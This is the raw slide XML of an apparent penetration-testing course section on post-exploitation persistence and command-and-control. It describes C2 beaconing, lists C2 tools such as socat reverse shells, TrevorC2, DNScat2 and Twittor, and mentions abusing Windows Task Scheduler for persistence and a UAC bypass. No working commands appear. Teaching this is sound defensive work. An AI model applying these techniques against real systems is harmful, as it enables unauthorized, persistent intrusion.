              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> with the compromised system that is an adversarial technique that allows the attacker to transfer information objects between processes or systems that, according to a security policy, are not supposed to be allowed to communicate.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRP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Attackers often use virtual machines in a cloud service or even use other compromised systems as C2 servers. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Even services such as Twitter, Dropbox, and Photobucket have been used for C2 tasks. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="Arial"/>
            </a:endParaRP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The C2 communication can be as simple as maintaining a timed beacon, or “heartbeat,” to launch additional attacks or for data exfiltration. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="306369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10783" y="0"/>
            <a:ext cx="9144000" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRP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r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Command and Control (C2) Utilities (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2221" y="957785"/>
            <a:ext cx="896227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a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The following figure shows how an attacker uses C2 to send instructions to two compromised systems.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagem 5" descr="Diagrama&#10;&#10;Descrição gerada automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19E855B3-97D3-19F3-8BC6-A5683FE6D491}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1766258" y="1496478"/>
            <a:ext cx="5298775" cy="2905353"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="333333">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="261614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10783" y="0"/>
            <a:ext cx="9144000" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRP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r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Command and Control (C2) Utilities (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2221" y="957785"/>
            <a:ext cx="896227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a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Many different techniques and utilities can be used to create a C2. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>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The following table shows some examples for more information.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Tabela 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{721CB557-F197-A7F7-6626-380F8D0562CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3248636880"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="334273" y="1714500"/>
          <a:ext cx="8498350" cy="2743200"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1953380">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2015850377"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6544970">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="246475397"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" kern="1200" noProof="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>socat</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>A C2 utility that can be used to create multiple reverse shells.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" noProof="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2369756855"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" noProof="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>wsc2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>A Python-based C2 utility that uses </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>WebSockets</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" noProof="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1515715921"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" noProof="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>WMImplant</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>A PowerShell-based tool that leverages WMI to create a C2 channel.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" noProof="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="552163738"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" noProof="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>DropboxC2 (DBC2)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>A C2 utility that uses Dropbox.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" noProof="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3517980995"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" noProof="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>TrevorC2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>A Python-based C2 utility created by Dave Kennedy of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>TrustedSec</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" noProof="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="747462147"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" noProof="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Twittor</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>A C2 utility that uses Twitter direct messages for command and control.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" noProof="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1049242645"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" noProof="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>DNScat2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>A DNS-based C2 utility that supports encryption and that has been used by malware, threat actors, and pen testers.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" noProof="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2343405558"/>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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1612873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10783" y="0"/>
            <a:ext cx="9144000" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRP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r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Command and Control (C2) Utilities (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2221" y="957785"/>
            <a:ext cx="896227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a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The following figure shows an example of how TrevorC2 can be used as a C2 framework.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>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It shows two terminal windows.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>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The terminal window on the left is the attacking system (C2 server), and the terminal window on the right is the victim (client).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Imagem 6" descr="Tela de computador com texto preto sobre fundo branco&#10;&#10;Descrição gerada automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B86E0F3-B946-CDA1-9E22-B443CA4D7014}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2078966" y="1991200"/>
            <a:ext cx="4694926" cy="2649156"/>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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="628139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10783" y="0"/>
            <a:ext cx="9144000" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRP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r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Scheduled Jobs and Tasks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2221" y="957785"/>
            <a:ext cx="8919142"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400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Windows has a command that attackers can use to schedule automated execution of tasks on a local or remote computer. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>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You can use this functionality for post-exploitation and persistence. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>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You can take advantage of the Windows Task Scheduler to bypass UAC if the user has access to its graphical interface. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>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This is possible because the security option runs with the system’s highest privileges. </a:t>
            </a:r>
